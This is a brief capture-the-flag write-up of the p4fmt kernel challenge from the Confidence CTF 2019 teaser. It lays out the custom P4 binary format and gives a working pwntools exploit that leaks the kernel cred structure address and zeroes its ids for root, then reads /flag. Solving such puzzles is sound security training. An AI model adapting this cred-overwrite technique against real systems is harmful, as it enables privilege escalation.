Rating: 4.0
Full writeup at [https://devcraft.io/2019/03/19/p4fmt-confidence-ctf-2019-teaser.html](https://devcraft.io/2019/03/19/p4fmt-confidence-ctf-2019-teaser.html)
P4 format is something like:
```c
enum p4_type {
SIMPLE=0,
ADVANCED=1
};
struct p4_mapping {
long load_addr;
long length;
long offset;
};
struct p4_bin {
char magic[2];
char version;
enum p4_type type;
int mapping_count;
long offset;
};
```
Exploit:
* leak creds address using a mapping count of 6
* create a mapping to overwrite the cred ids with 0 using __clear_user
```python
from pwn import *
context.arch = "amd64"
context.os = "linux"
code = asm(shellcraft.cat("/flag") + shellcraft.exit())
creds = 0xffff93a1875f80c0 # leaked creds struct
payload = ""
payload += "P4" # magic
payload += p8(0) # version
payload += p8(1) # type
payload += p32(3) # count
payload += p64(0x10) # offset
payload += p64(0x400058) # entry
payload += p64(0)
payload += p64(0)
payload += p64(0x400000 | 7) # prot
payload += p64(0x1000)
payload += p64(0)
payload += p64((creds + 0x10) | 8) # clear
payload += p64(0x20)
payload += p64(0)
payload += code
print "rm b; printf '" + payload.encode("string_escape") + "'>b;chmod +x ./b; ./b"
```